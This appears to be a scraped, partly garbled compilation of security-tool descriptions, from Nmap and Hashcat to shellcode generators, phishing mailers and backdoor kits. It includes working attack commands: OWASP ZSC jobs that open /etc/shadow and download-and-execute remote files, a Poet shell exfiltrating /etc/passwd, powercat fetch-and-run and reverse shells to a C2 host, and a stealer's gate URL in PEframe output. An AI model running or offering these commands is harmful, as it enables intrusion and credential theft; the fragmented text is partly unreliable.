DownloadNipper
NMAP 7 - SECURITY SCANNER FOR NETWORK
EXPLORATION & SECURITY AUDITS
Before we get into the detailed changes, here are the top 7
improvements in Nmap 7:
1. Major Nmap Scripting Engine (NSE) Expansion
As the Nmap core has matured, more and more new
functionality is developed as part of our NSE subsystem
instead. In fact, we've added 171 new scripts and 20 libraries
since Nmap 6. Exmaples include firewall-bypass, supermicroipmi-conf, oracle-brute-stealth, and ssl-heartbleed. And NSE is
now powerful enough that scripts can take on core functions
Download Nmap 7
NOPO - NOSQL HONEYPOT FRAMEWORK
NoPo works out of the box with Python version 2.6.x and 2.7.x
on any platform.
Added Features:
Usage
Download NoPo
NORIBEN - YOUR PERSONAL, PORTABLE MALWARE
SANDBOX
Cool Features
If you have a folder of YARA signature files, you can specify it
with the --yara option. Every new file create will be scanned
against these signatures with the results displayed in the output
results.
If you have a VirusTotal API, place it into a file named
"virustotal.api" (or embed directly in the script) to auto-submit
MD5 file hashes to VT to get the number of viral results.
You can add lists of MD5s to auto-ignore (such as all of your
system files). Use md5deep and throw them into a text file, use
--hash to read them.
You can automate the script for sandbox-usage. Using -t to
automate execution time, and --cmd "path\exe" to specify a
malware file, you can automatically run malware, copy the
results off, and then revert to run a new sample.
The --generalize feature will automatically substitute absolute
paths with Windows environment paths for better IOC
@bbaskin
]===--
usage: Noriben.py [-h] [-c CSV] [-p PML] [-f FILTER] [-hash HASH]
[-t TIMEOUT] [--output OUTPUT] [--yara
YARA] [--generalize]
[--cmd CMD] [-d]
optional arguments:
-h, --help
CSV file
-p PML, --pml PML
PML file
-f FILTER, --filter FILTER
Specify alternate Procmon Filter
PMC
--hash HASH
--yara YARA
--generalize
environment variables.
Default: True
--cmd CMD
quotes)
-d
Download Noriben
NSEARCH - NMAP SCRIPT ENGINE SEARCH
NSEarch is a tool that helps you find scripts that are used nmap
(NSE) , can be searched using the name or category , it is also
possible to see the documentation of the scripts found.
USAGE:
$ python nsearch.py
Main Menu
Initial Setup
================================================
_
_____
| \ | |/
|
_____
___||
___|
\| |\ `--. | |__
| . ` | `--. \|
| |\
| |
__ _
__|
_ __
___ | |__
\__,_||_|
| (__ | | | |
\___||_| |_|
================================================
Version 0.3
@jjtibaquira
================================================
Creating Database :nmap_scripts.sqlite3
Creating Table For Script ....
Creating Table for Categories ....
Creating Table for Scripts per Category ....
Upload Categories to Categories Table ...
Main Console
================================================
_
_____
| \ | |/
|
_____
___||
___|
\| |\ `--. | |__
| . ` | `--. \|
| |\
__|
| |
__ _
_ __
___ | |__
\__,_||_|
| (__ | | | |
\___||_| |_|
================================================
Version 0.3
@jjtibaquira
================================================
nsearch>
Basic Commands
================================================
_
_____
| \ | |/
|
_____
___||
___|
\| |\ `--. | |__
| . ` | `--. \|
| |\
| |
__ _
__|
_ __
___ | |__
| (__ | | | |
\__,_||_|
\___||_| |_|
================================================
Version 0.3
@jjtibaquira
================================================
nsearch> help
Nsearch Commands
================
clear
doc
exit
help
history
last
search
nsearch>
================================================
_
_____
| \ | |/
|
_____
___||
___|
\| |\ `--. | |__
| . ` | `--. \|
| |\
__|
| |
__ _
_ __
___ | |__
\__,_||_|
| (__ | | | |
\___||_| |_|
================================================
Version 0.3
@jjtibaquira
================================================
_____
| \ | |/
|
_____
___||
___|
| |
\| |\ `--. | |__
| . ` | `--. \|
| |\
__ _
__|
_ __
___ | |__
\__,_||_|
| (__ | | | |
\___||_| |_|
================================================
Version 0.3
@jjtibaquira
================================================
nsearch> search name:ssh
1.ssh-hostkey.nse
2.ssh2-enum-algos.nse
3.sshv1.nse
nsearch>
================================================
_
| \ | |/
|
_____
___||
_____
___|
\| |\ `--. | |__
| |
__ _
_ __
___ | |__
| . ` | `--. \|
| |\
__|
\__,_||_|
| (__ | | | |
\___||_| |_|
================================================
Version 0.3
@jjtibaquira
================================================
nsearch> doc ssh <TAB>
ssh-hostkey.nse
ssh2-enum-algos.nse
sshv1.nse
DownloadNSEarch
OCLHASHCAT V2.01 - WORLDS FASTEST PASSWORD
CRACKER
oclHashcat is the world's fastest and most advanced GPGPUbased password recovery utility, supporting five unique modes
of attack for over 170 highly-optimized hashing algorithms.
oclHashcat currently supports AMD (OpenCL) and Nvidia
(CUDA) graphics processors on GNU/Linux and Windows
7/8/10, and has facilities to help enable distributed password
cracking.
FEATURES
ATTACK-MODES
Straight *
Combination
Brute-force
Hybrid dict + mask
Hybrid mask + dict
* accept Rules
ALGORITHMS
MD4
MD5
Half MD5 (left, mid, right)
SHA1
SHA-256
SHA-384
SHA-512
SHA-3 (Keccak)
SipHash
RipeMD160
Whirlpool
GOST R 34.11-94
GOST R 34.11-2012 (Streebog) 256-bit
GOST R 34.11-2012 (Streebog) 512-bit
Double MD5
Double SHA1
md5($pass.$salt)
md5($salt.$pass)
md5(unicode($pass).$salt)
md5($salt.unicode($pass))
md5(sha1($pass))
md5($salt.md5($pass))
md5($salt.$pass.$salt)
md5(strtoupper(md5($pass)))
sha1($pass.$salt)
sha1($salt.$pass)
sha1(unicode($pass).$salt)
sha1($salt.unicode($pass))
sha1(md5($pass))
sha1($salt.$pass.$salt)
sha256($pass.$salt)
sha256($salt.$pass)
sha256(unicode($pass).$salt)
sha256($salt.unicode($pass))
sha512($pass.$salt)
sha512($salt.$pass)
sha512(unicode($pass).$salt)
sha512($salt.unicode($pass))
HMAC-MD5 (key = $pass)
HMAC-MD5 (key = $salt)
HMAC-SHA1 (key = $pass)
HMAC-SHA1 (key = $salt)
HMAC-SHA256 (key = $pass)
HMAC-SHA256 (key = $salt)
HMAC-SHA512 (key = $pass)
HMAC-SHA512 (key = $salt)
PBKDF2-HMAC-MD5
PBKDF2-HMAC-SHA1
PBKDF2-HMAC-SHA256
PBKDF2-HMAC-SHA512
MyBB
phpBB3
SMF
vBulletin
IPB
Woltlab Burning Board
osCommerce
xt:Commerce
PrestaShop
Mediawiki B type
Wordpress
Drupal
Joomla
PHPS
Django (SHA-1)
Django (PBKDF2-SHA256)
EPiServer
ColdFusion 10+
Apache MD5-APR
MySQL
PostgreSQL
MSSQL
Oracle H: Type (Oracle 7+)
Oracle S: Type (Oracle 11+)
Oracle T: Type (Oracle 12+)
Sybase
hMailServer
DNSSEC (NSEC3)
IKE-PSK
IPMI2 RAKP
iSCSI CHAP
Cram MD5
MySQL Challenge-Response Authentication (SHA1)
PostgreSQL Challenge-Response Authentication (MD5)
SIP Digest Authentication (MD5)
WPA
WPA2
NetNTLMv1
NetNTLMv1 + ESS
NetNTLMv2
Kerberos 5 AS-REQ Pre-Auth etype 23
Netscape LDAP SHA/SSHA
LM
NTLM
Domain Cached Credentials (DCC), MS Cache
Domain Cached Credentials 2 (DCC2), MS Cache 2
MS-AzureSync PBKDF2-HMAC-SHA256
descrypt
bsdicrypt
md5crypt
sha256crypt
sha512crypt
bcrypt
scrypt
OSX v10.4
OSX v10.5
OSX v10.6
OSX v10.7
OSX v10.8
OSX v10.9
OSX v10.10
AIX {smd5}
AIX {ssha1}
AIX {ssha256}
AIX {ssha512}
Cisco-ASA
Cisco-PIX
Cisco-IOS
Cisco $8$
Cisco $9$
Juniper IVE
Juniper Netscreen/SSG (ScreenOS)
Android PIN
GRUB 2
CRC32
RACF
Radmin2
Redmine
Citrix Netscaler
SAP CODVN B (BCODE)
SAP CODVN F/G (PASSCODE)
SAP CODVN H (PWDSALTEDHASH) iSSHA-1
PeopleSoft
Skype
7-Zip
RAR3-hp
PDF 1.1 - 1.3 (Acrobat 2 - 4)
PDF 1.4 - 1.6 (Acrobat 5 - 8)
PDF 1.7 Level 3 (Acrobat 9)
PDF 1.7 Level 8 (Acrobat 10 - 11)
MS Office <= 2003 MD5
DownloadoclHashcat v2.01
OPENVAS - THE WORLD'S MOST ADVANCED OPEN
SOURCE VULNERABILITY SCANNER AND MANAGER
OpenVAS Scanner
...
OpenVAS Manager
Scheduled scans
User Management
Feed synchronisation
...
Multi-language support
...
OpenVAS CLI
...
Download OpenVAS
OWASP ZAP 2.4.0 - PENETRATION TESTING TOOL FOR
TESTING WEB APPLICATIONS
An error occurred.
Try watching this video on www.youtube.com, or enable JavaScript if it is
disabled in your browser.
By default only the essential tabs are now shown when ZAP
starts up.
The remaining tabs are revealed when they are used (e.g. for
the spider and active scanner) or when you display them via
the special tab on the far right of each window with the green '+'
icon. This special tab disappears if there are no hidden tabs.
Tabs can be closed via a small 'x' icon which is shown when
Release 2.4.1
Bug fixes:
Issue
444
:
Guaranteed
NPE
on
AliasCertificate.getName() if getCN()==null
Issue 1442 : Up/Down arrow keys in results stop working if
"reflected"
Issue 1473 : Spider does not handle URLs extracted from
meta tags correctly
Issue 1497 : The spider is extracting and reporting links
from comments - event when instructed not to do so
Issue 1598 : startup script lacks support for FreeBSD
Issue 1615 : Search "All" option not working
Issue 1617 : ZAP 2.4.0 throws HeadlessExceptions when
running in daemon mode on headless machine
Issue 1618 : Target Technology Not Honored
Issue 1619 : Search regex might not be validated
Issue 1624 : Error while loading ZAP 2.4.0
Issue 1626 : Structural parameters not saved when
context exported and not available via the API
Issue 1636 : Users (for auth) & Forced User not loaded
from session
Issue 1647 : Wrong reference in Zest Result
Issue 1674 : Ajax spider not considering get parameters
Issue 1677 : Fuzzers can't be expanded on OS X
Issue 1694 : "Error: setting file is missing. Program will
exit." even if file exists
Issue 1698 : Escape API exceptions
Issue 1700 : Forced Browse Lists Missing from DropDown in 2.4.0
Usage of shellcodes
Shellcodesare small codes in assembly which could be use as
the payload in software exploiting. Other usages are in
malwares, bypassing antiviruses, obfuscated codes and etc.
Why use OWASP ZSC?
With these switch you can see the oslist,encode types and
functions [joblist] to generate your shellcode.
OS List "-oslist"
[+] linux_x86
[+] linux_x64
[+] linux_arm
[+] linux_mips
[+] freebsd_x86
[+] freebsd_x64
[+] windows_x86
[+] windows_x64
[+] osx
[+] solaris_x86
[+] solaris_x64
Functions "-joblist"
[+] exec('/path/file')
[+] chmod('/path/file','permission number')
[+] write('/path/file','text to write')
[+] file_create('/path/file','text to write')
[+] dir_create('/path/folder')
[+] download('url','filename')
[+] download_execute('url','filename','command to
execute')
[+] system('command to execute')
[+] script_executor('name of script','path and name of
shadow','777')" -o file.txt
>zsc -os linux_x86 -encode xor_random -job "chmod('/etc/
passwd','444')" -o file.txt
>zsc -os linux_x86 -encode xor_0x41414141 -job "chmod('/
etc/shadow','777')" -o file.txt
>zsc -os linux_x86 -encode xor_0x45872f4d -job "chmod('/
etc/passwd','444')" -o file.txt
>zsc -os linux_x86 -encode add_random -job "chmod('/etc/
passwd','444')" -o file.txt
>zsc -os linux_x86 -encode add_0x41414141 -job "chmod('/
etc/passwd','777')" -o file.txt
>zsc -os linux_x86 -encode sub_random -job "chmod('/etc/
passwd','777')" -o file.txt
>zsc -os linux_x86 -encode sub_0x41414141 -job "chmod('/
etc/passwd','444')" -o file.txt
>zsc -os linux_x86 -encode none -job "file_create('/root/
Desktop/hello.txt','hello')" -o file.txt
>zsc -os linux_x86 -encode none -job "file_create('/root/
Desktop/hello2.txt','hello[space]world[space]!')" -o
file.txt
>zsc -os linux_x86 -encode none -job "dir_create('/root/
Desktop/mydirectory')" -o file.txt
>zsc -os linux_x86 -encode none -job "download('http://
www.z3r0d4y.com/exploit.type','myfile.type')" -o file.txt
>zsc -os linux_x86 -encode none -job
"download_execute('http://www.z3r0d4y.com/
exploit.type','myfile.type','./myfile.type')" -o file.txt
#multi command
>zsc -os linux_x86 -encode none -job
"download_execute('http://www.z3r0d4y.com/
exploit.type','myfile.type','chmod[space]777[space]myfile
.type;sh[space]myfile.type')" -o file.txt
>zsc -os linux_x86 -encode none -job
"script_executor('script.type','D:\\myfile.type','./
script.type')" -o file.txt
>zsc -os linux_x86 -encode none -job
"script_executor('z3r0d4y.sh','/root/
z3r0d4y.sh','sh[space]z3r0d4y.sh')" -o file.txt
>zsc -os linux_x86 -encode none -job
"script_executor('ali.py','/root/Desktop/
0day.py','chmod[space]+x[space]ali.py;
[space]python[space]ali.py')" -o file.txt
>zsc -os linux_x86 -encode none -job "system('ls')" -o
file.txt
>zsc -os linux_x86 -encode none -job "system('ls[space]la')" -o file.txt
>zsc -os linux_x86 -encode none -job "system('ls[space]la[space]/etc/shadow;chmod[space]777[space]/etc/
shadow;ls[space]-la[space]/etc/shadow;cat[space]/etc/
shadow;wget[space]file[space];chmod[space]777[space]file;
./file')" -o file.txt
>zsc -os linux_x86 -encode none -job
"system('wget[space]file;sh[space]file')" -o file.txt
>zsc -os linux_x86 -encode none -job "chmod('/etc/
shadow','777')" -o file.txt
>zsc -os linux_x86 -encode none -job "write('/etc/
passwd','user:pass')" -o file.txt
>zsc -os linux_x86 -encode none -job "exec('/bin/bash')"
-o file.txt
shellcode.
N
o
t
e
:
script_executor(),download_execute(),download(),dir_create(),fi
le_create() are using linux command line , not the function.
[wget,mkdir,echo] system() function added in script, you can
use it to do anything and generate any command line
shellcode.
Note: exec() doesnt support any ARGV same as exec(/bin/
bash -c ls) or exec(/bin/bash,-c,ls), you have to wait for next
version and this feature will available in system()
Note: you also can use high value for inc and dec time, like
inc_100000, your shellcode may get too big
Note: each time you execute chmod()[or any other] function
with random encode, you are gonna get random outputs and
different shellcode.
Note: your xor value could be anything. xor_0x41414141 and
xor_0x45872f4d are examples.
Wizard Switch
With -wizard switch you are able to generate shellcode without
long ARGVs, software will ask you for information.
Note: While you are using -wizard switch, if you push Enter
without typing anything, the default value will be set on the
varible.
Note: With entering list, List of values will be shown.
Available Features
[linux_x86]
add mix_all encoding in dir_create() [linux_x86]
add xor_random encoding in download() [linux_x86]
add xor_yourvalue encoding in download() [linux_x86]
add add_random encoding in download() [linux_x86]
add add_yourvalue encoding in download() [linux_x86]
add sub_random encoding in download() [linux_x86
add sub_yourvalue encoding in download() [linux_x86]
add inc encoding in download() [linux_x86]
add inc_timesyouwant encoding in download() [linux_x86
add dec encoding in download() [linux_x86]
add dec_timesyouwant encoding in download() [linux_x86]
add mix_all encoding in download() [linux_x86]
add xor_random encoding in download_execute()
[linux_x86]
add xor_yourvalue encoding in download_execute()
[linux_x86]
add add_random encoding in download_execute()
[linux_x86]
add add_yourvalue encoding in download_execute()
[linux_x86]
add sub_random encoding in download_execute()
[linux_x86
add sub_yourvalue encoding in download_execute()
[linux_x86]
add inc encoding in download_execute() [linux_x86]
add inc_timesyouwant encoding in download_execute()
[linux_x86
add dec encoding in download_execute() [linux_x86]
add dec_timesyouwant encoding in download_execute()
[linux_x86]
add mix_all encoding in download_execute() [linux_x86]
add xor_random encoding in system() [linux_x86]
add xor_yourvalue encoding in system() [linux_x86]
add add_random encoding in system() [linux_x86]
add add_yourvalue encoding in system() [linux_x86]
DownloadOWASP ZSC
PACKET SENDER - THE UDP AND TCP NETWORK TEST
UTILITY
Change log
Version 2015-04-19
Portable mode
Read in file from command line
Save traffic log
Mobile versions have been abandoned. Project focus
is now on the far more popular desktop version.
Version 2015-02-13
Migrated to GitHub
New vector-based logo
Bug fix in quick-disable/enable
Migrated to Qt 5.4
Ubuntu version brought up to date.
Forums are closed (spammers killed it).
Version 2014-10-07
Initial launch of forums.
Multi-Send.
Quick-send from traffic log selected packets.
Packet Export/Import.
Rolling traffic log support.
Numerous configuration settings added:
Copy raw packet data to clipboard.
Receive before send.
Connection delays for slow devices.
Command line interface default binds to 0.
Universal (XP through 8.1) Windows installer.
Migrated to Qt 5.3
Some rework of the "About" section.
Version 2014-02-22
TCP connections are now fully threaded (no more UI
freezes).
Brand new and highly capable command line
interface. (Run PacketSender --help)
Some mild UI enhancements to make sending
easier.
DownloadPacket Sender
DownloadPackETH
PASSGEN - RANDOM CHARACTER GENERATOR CRUNCH
TO CRACK WPA/WPA2
-U uppercase ascii
-U1 uppercase ascii + digits
-lU lowercase + uppercase ascii
-lU1 lowercase + uppercase ascii + digits
-C [char] [length] custom character set + length
Download Passgen
PASSWORD CRACKING SUITE
Dics Path:
In this path, you can add any dictionary you would like to use.
Tools Path:
In this path, the script will install 3rd party tools. You can
download some here:
http://www.moehre.org/bruteforce.html
http://cyberwarzone.com/cyberwarfare/password-crackingmega-collection-password-cracking-word-lists
http://www.packetstormsecurity.org/Crackers/wordlists/
http://www.theargon.com/achilles/wordlists/
http://www.openwall.com/wordlists/
http://www.outpost9.com/files/WordLists.html
FTP
POP3
IMAP
SMTP
Options
--json
Output in json
--import
--export
--dir-import
Import directory
--dir-export
Export directory
Debug directory
--dir-tls
TLS directory
--strings
--sections
Sections information
--dump
Install
Prerequisites
Python 2.6.5 -> 2.7.x
Install
from pypi
# pip install https://github.com/guelfoweb/peframe/
archive/master.zip
from git
$ git clone https://github.com/guelfoweb/peframe.git
$ cd peframe
# python setup.py install
Example
$ peframe malware.exe
Short information
-----------------------------------------------------------
File Name
malware.exe
File Size
935281 byte
Compile Time
2012-01-29 22:32:28
DLL
False
Sections
Hash MD5
cae18bdb8e9ef082816615e033d2d85b
Hash SAH1
546060ad10a766e0ecce1feb613766a340e875c0
Imphash
353cf96592db561b5ab4e408464ac6ae
Detected
Directory
Security
XOR discovered
----------------------------------------------------------Key length
Offset (hex)
Offset (dec)
0x5df4e
384846
0x5df4e
384846
0x5df4e
384846
0x5df4e
384846
Digital Signature
----------------------------------------------------------Virtual Address
12A200
Block Size
4813 byte
Hash MD5
63b8c4daec26c6c074ca5977f067c21e
Hash SHA-1
53731a283d0c251f7c06f6d7d423124689873c62
Packer
Packer
Packer
FindWindowExW
Anti Debug
FindWindowW
Anti Debug
GetWindowThreadProcessId
Anti Debug
IsDebuggerPresent
Anti Debug
OutputDebugStringW
Anti Debug
Process32FirstW
Anti Debug
Process32NextW
Anti Debug
TerminateProcess
Anti Debug
UnhandledExceptionFilter
Virtual Box
Trick
VMware trick
--Function
CreateDirectoryA
Function
CreateFileA
Function
CreateFileMappingA
Function
CreateToolhelp32Snapshot
Function
DeleteFileA
Function
FindFirstFileA
Function
FindNextFileA
Function
GetCurrentProcess
Function
GetFileAttributesA
Function
GetFileSize
Function
GetModuleHandleA
Function
GetProcAddress
Function
GetTempPathA
Function
GetTickCount
Function
GetUserNameA
Function
GetVersionExA
Function
InternetCrackUrlA
Function
LoadLibraryA
Function
MapViewOfFile
Function
OpenProcess
Function
Process32First
Function
Process32Next
Function
RegCloseKey
Function
RegCreateKeyA
Function
RegEnumKeyExA
Function
RegOpenKeyA
Function
RegOpenKeyExA
Function
Sleep
Function
WSAStartup
Function
WriteFile
Function
closesocket
Function
connect
Function
recv
Function
send
Function
socket
.data
Hash MD5
b896a2c4b2be73b89e96823c1ed68f9c
Hash SHA-1
523d58892f0375c77e5e1b6f462005ae06cdd0d8
Section
.rdata
Hash MD5
41795b402636cb13e2dbbbec031dbb1a
Hash SHA-1
b674141b34f843d54865a399edfca44c3757df59
File name discovered [43]
----------------------------------------------------------Binary
wiseftpsrvs.bin
Data
ESTdb2.dat
Data
Favorites.dat
Data
History.dat
Data
bookmark.dat
Data
fireFTPsites.dat
Data
quick.dat
Data
site.dat
Data
sites.dat
Database
FTPList.db
Database
sites.db
Database
NovaFTP.db
Executable
unleap.exe
Executable
explorer.exe
FTP Config
FTPVoyager.ftp
Library
crypt32.dll
Library
kernel32.dll
Library
mozsqlite3.dll
Library
userenv.dll
Library
wand.dat
Library
wininet.dll
Library
wsock32.dll
Text
Connections.txt
Text
ftplist.txt
Text
signons.txt
Text
signons2.txt
Text
signons3.txt
RhinoSoft.com
Url
http://0uk.net/zaaqw/gate.php
AutoIt v3 Script
FileVersion
3, 3, 8, 1
FileDescription
Translation
0x0809 0x04b0
DownloadPEframe
PEINJECTOR - MITM PE FILE INFECTOR
DownloadPEInjector
PEMCRACKER - TOOL TO CRACK ENCRYPTED PEM
FILES
Usage Example
bwall@ragnarok:~/data/publicprojects/pemcracker$ ./
pemcracker test.pem test.dict
Password is komodia for test.pem
Compiling
make
Download Pemcracker
PENTESTBOX - PORTABLE PENETRATION TESTING
DISTRIBUTION FOR WINDOWS ENVIRONMENTS
PentestBox Demo
from Pentest Box
Tools category
DownloadPentestBox
PENTESTPACKAGE - A PACKAGE OF MULTIPLE
PENTEST SCRIPTS
CONTENTS:
Download PentestPackage
PENTOO 2015 - SECURITY-FOCUSED LIVECD BASED ON
GENTOO
Current Features :
Changes saving (including unetbooting support)
CUDA/OpenCL Enhanced cracking software
Kernel 4.0.8 and all needed patches for injection
XFCE 4.12
Please see blog for full release notes including known
bootloader issues with some versions of unetbootin
Full tools list.
DownloadPentoo 2015
PHAN - STATIC ANALYZER FOR PHP
Getting it running
Phan requires PHP 7+ with the php-ast extension loaded. The
code you analyze can be written for any version of PHP.
To get phan running;
1. Clone the repo
2. Run composer install to load dependencies
3. Run ./test to run the test suite
4. Test phan on itself by running the following
./phan `find src/ -type f -path '*.php'`
phpize
./configure
make install
or give it a text file containing a list of files (but see the next
section) to scan:
phan -f filelist.txt
class lang_installer
test2.php:4 TypeError arg#1(arg) is object but
escapeshellarg() takes string
test2.php:4 TypeError arg#1(msg) is int but logmsg()
takes string defined at sth.php:5
test2.php:4 TypeError arg#2(level) is string but logmsg()
takes int defined at sth.php:5
test3.php:11 TypeError arg#1(number) is string but
number_format() takes float
test3.php:12 TypeError arg#1(string) is int but
htmlspecialchars() takes string
test3.php:13 TypeError arg#1(str) is int but md5() takes
string
test3.php:14 TypeError arg#1(separator) is int but
explode() takes string
test3.php:14 TypeError arg#2(str) is int but explode()
takes string
You can see the full list of command line options by running
phan -h .
Generating a file list
This static analyzer does not track includes or try to figure out
autoloader magic. It treats all the files you throw at it as one big
application. For code encapsulated in classes this works well.
For code running in the global scope it gets a bit tricky because
order matters. If you have an index.php including a file that
sets a bunch of global variables and you then try to access
those after the include in index.php the static analyzer won't
know anything about these.
In practical terms this simply means that you should put your
entry points and any files setting things in the global scope at
the top of your file list. If you have aconfig.php that sets
global variables that everything else needs put that first in the
list followed by your various entry points, then all your library
files containing your classes.
Bugs
When you find an issue, please take the time to create a tiny
reproducing code snippet that illustrates the bug. And once you
have done that, fix it. Then turn your code snippet into a test
and add it to tests then ./test and send a PR with your fix
and test. Alternatively, you can open an Issue with details.
More on phpdoc types
All the phpdoc types listed on that page should work with one
exception. It says that (int|string)[] would indicate an array
of ints or strings. phan doesn't support a mixed-type constraint
like that. You can say int[]|string[] meaning that the array
has to contain either all ints or all strings, but if you have mixed
types, just use array .
That means you can do:
<?php
/**
* MyFunc
* @param int
$arg1
* @param int|string
$arg2
* @param int[]|int
$arg3
checks the first 5 elements. If the first 5 are of the same type, it
assumes the rest are as well. If it can't determine the array subtype it just becomes array which will pass through most type
checks. In practical terms, this means that [1,2,'a'] is seen
as array but [1,2,3] is int[] and ['a','b','c'] as
string[] .
Dealing with dynamic code that confuses the analyzer
There are times when there is just no way for the analyzer to
get things right. For example:
<?php
function test() {
$var = 0;
$var = call_some_func_you_cant_hint();
if(is_string($var)) {
$pos = strpos($var, '|');
}
}
This tells the analyzer that along with the int that it figures out
on its own, $var can also be a string or an array inside that
One of the big changes in PHP 7 is the fact that the parser now
uses a real Abstract Syntax Tree ( AST ). This makes it much
easier to write code analysis tools by pulling the tree and
walking it looking for interesting things.
Phan has 2 passes. On the first pass it reads every file, gets
the AST and recursively parses it looking only for functions,
methods and classes in order to populate a bunch of global
hashes which will hold all of them. It also loads up definitions
for all internal functions and classes. The type info for these
come from a big file called FunctionSignatureMap.
The real complexity hits you hard in the second pass. Here
some things are done recursively depth-first and others not. For
example, we catch something likeforeach($arr as $k=>$v)
because we need to tell the foreach code block that $k and $v
exist. For other things we need to recurse as deeply as
possible into the tree before unrolling our way back out. For
example, for something like c(b(a(1))) we need to call a(1)
and check that a()actually takes an int, then get the return type
and pass it to b() and check that, before doing the same to
c() .
There is a Scope object which keeps track of all variables. It
mimics PHP's scope handling in that it has a globals along with
entries for each function, method and closure. This is used to
detect undefined variables and also type-checked on a return
$var .
Quick Mode Explained
Running tests
vendor/bin/phpunit
Download Phan
PHEMAIL - AUTOMATE SENDING PHISHING EMAILS
<body>]
-e
(Default: emails.txt)
-f
Newsletter)
-b
-p
body.txt)
searched (Default: 10 pages)
-v
-l
-B
-m
-g
pictures
to
username:password
-t
(Default: 3 sec)
-R
-L
emails)
webserver log file (Default: Date time in format "%d_%m_
%Y_%H_%M")
-S
-d
-n
(Default: 10 emails)
-c
-w
-o
-F
points to
0- firstname surname
1- firstname.surname@example.com
2- firstnamesurname@example.com
3- f.surname@example.com
4- firstname.s@example.com
5- surname.firstname@example.com
6- s.firstname@example.com
7- surname.f@example.com
8- surnamefirstname@example.com
9- firstname_surname@example.com
Examples: phemail.py -e emails.txt -f "Name Surname
<name_surname@example.com>" -r "Name Surname
<name_surname@example.com>" -s "Subject" -b body.txt
phemail.py -S example -d example.com -F 1 -p 12
phemail.py -c https://example.com
Disclaimer
Download PhEmail
PIXIEWPS - BRUTEFORCE OFFLINE THE WPS PIN (PIXIE
DUST ATTACK)
INSTALLATION
USAGE
Usage: pixiewps <arguments>
Required Arguments:
-e, --pke
-r, --pkr
-s, --e-hash1
: Enrollee Hash1
-z, --e-hash2
: Enrollee Hash2
-a, --authkey
Optional Arguments:
-n, --e-nonce
: Enrollee nonce
-m, --r-nonce
: Registrar nonce
-b, --e-bssid
: Enrollee BSSID
-S, --dh-small
not needed)
[No]
-f, --force
[No]
-v, --verbosity
quietest
-h, --help
USAGE EXAMPLE
DownloadPixiewps
PLECOST - WORDPRESS VULNERABILITIES FINDER
This Plecost 3 version, add a lot of new features and fixes, like:
Fixed a lot of bugs.
XML
$ plecost -v http://SITE.com -o results.xml
Or...
$ plecost -c 10 http://SITE.com
Updating
ScreenShots
DownloadPlecost
POET - A SIMPLE POST-EXPLOITATION TOOL
$ cd poet
$ make
Poet is super easy to use, and requires nothing more than the
Python (2.7) standard library. To easily try it out, a typical
invocation would look like:
Terminal 1:
$ ./poet-client -v 127.0.0.1 1
Terminal 2:
$ sudo ./poet-server
server
INTERVAL
(s)
optional arguments:
-h, --help
$ ./poet-server -h
usage: poet-server [-h] [-p PORT]
optional arguments:
-h, --help
Demo
# ./poet-server
_
____
____
___
/ /_
/ __ \/ __ \/ _ \/ __/
/ /_/ / /_/ /
__/ /
/ .___/\____/\___/\__/
/_/
[+] Poet server started on 443.
[+] (2015-03-27 03:40:42.272601) Connected By:
('5.4.3.2', 59309) -> VALID
[+] (2015-03-27 03:40:42.273087) Entering control shell
Welcome to psh, the Poet shell!
Running `help' will give you a list of supported
commands.
psh > shell
psh > user@server $ uname -a
Linux lolServer 3.8.0-29-generic #42~precise1-Ubuntu SMP
Wed May 07 16:19:23 UTC 2014 x86_64 x86_64 x86_64 GNU/
Linux
psh > user@server $ ^D
psh > exfil /etc/passwd
psh : exfil written to archive/20150327/exfil/
passwd-201503274054.txt
psh > help
Commands:
chint
dlexec
exec
exfil
exit
help
recon
selfdestruct
shell
psh > exit
[+] (2015-03-27 03:40:57.144083) Exiting control shell.
[-] (2015-03-27 03:40:57.144149) Poet server terminated.
DownloadPoet
PORTDOG - SIMPLE PYTHON SCRIPT TO DETECT PORT
SCANNING TECHNIQUES
Raw packets for analysis. For this reason, please ensure that
you have run this script from privileged session.
Usage:
sudo python portdog.py -t time_for_sniff_in_minutes
DownloadPortDog
PORTEXPERT - MONITORS ALL APPLICATIONS
CONNECTED TO THE INTERNET
HTTPS,...
Capability to show/hide system level processes
Capability to show/hide loopbacks
Time freeze function
DownloadPortExpert
POWERCAT - NETCAT: THE POWERSHELL VERSION
Installation
powercat is a powershell function. First you need to load the
function before you can execute it. You can put one of the
below commands into your powershell profile so powercat is
automatically loaded when powershell starts.
Load The Function From Downloaded .ps1 File:
. .\powercat.ps1
Load The Function From URL:
IEX (New-Object
System.Net.Webclient).DownloadString('https://
raw.githubusercontent.com/besimorhino/powercat/master/
powercat.ps1')
Parameters:
-l
[Switch]
-c
Connect to a listener.
[String]
-p
[String]
-e
Execute. (GAPING_SECURITY_HOLE)
[String]
-ep
Execute Powershell.
[Switch]
-r
10.1.1.1:443"
-u
[String]
[Switch]
-dns
[String]
-dnsft
[int32]
-t
[int32]
-i
[object]
-o
"String"
-of
[String]
-d
[Switch]
-rep
[Switch]
-g
Generate Payload.
[Switch]
-ge
[Switch]
-h
[Switch]
Basic Connections
File Transfer
Shells
powercat supports more than sending data over TCP. Specify u to enable UDP Mode. Data can also be sent to a dnscat2
server with -dns.
Send Data Over UDP:
powercat -c 10.1.1.1 -p 8000 -u
powercat -l -p 8000 -u
Connect to the c2.example.com dnscat2 server using the
DNS server on 10.1.1.1:
powercat -c 10.1.1.1 -p 53 -dns c2.example.com
Send a shell to the c2.example.com dnscat2 server using
the default DNS server in Windows:
powercat -dns c2.example.com -e cmd
Relays
Generate Payloads
Misc Usage
Download Powercat
POWERTOOLS - COLLECTION OF POWERSHELL
PROJECTS WITH A FOCUS ON OFFENSIVE OPERATIONS
PowerUp
PowerUp is a powershell tool to assist with local privilege
escalation on Windows systems. It contains several methods to
identify and abuse vulnerable services, as well as DLL hijacking
opportunities, vulnerable registry settings, vulnerable schtasks,
and more.
Service Enumeration:
Get-ServiceUnquoted
Get-ServiceFilePermission
returns services
modifies a modifiable
Service Abuse:
Invoke-ServiceUserAdd
execute an arbitrary
replaces a service
replaces a service
restores a replaced
starts a given
Invoke-ServiceStop
Invoke-ServiceEnable
enables a given
disables a given
returns detailed
service
service
Invoke-ServiceDisable
service
Get-ServiceDetail
DLL Hijacking:
Find-DLLHijack
writes out a
checks if the
Registry Checks:
Get-RegAlwaysInstallElevated
Misc.:
Get-VulnSchTask
finds remaining
PowerBreach
PowerBreach is a backdoor toolkit that aims to provide the user
a wide variety of methods to backdoor a system. It focuses on
diversifying the "trigger" methods which allows the user
flexibility on how to signal to the backdoor that it needs to
phone home. PowerBreach focuses on memory only methods
that do not persist across a reboot without further assistance
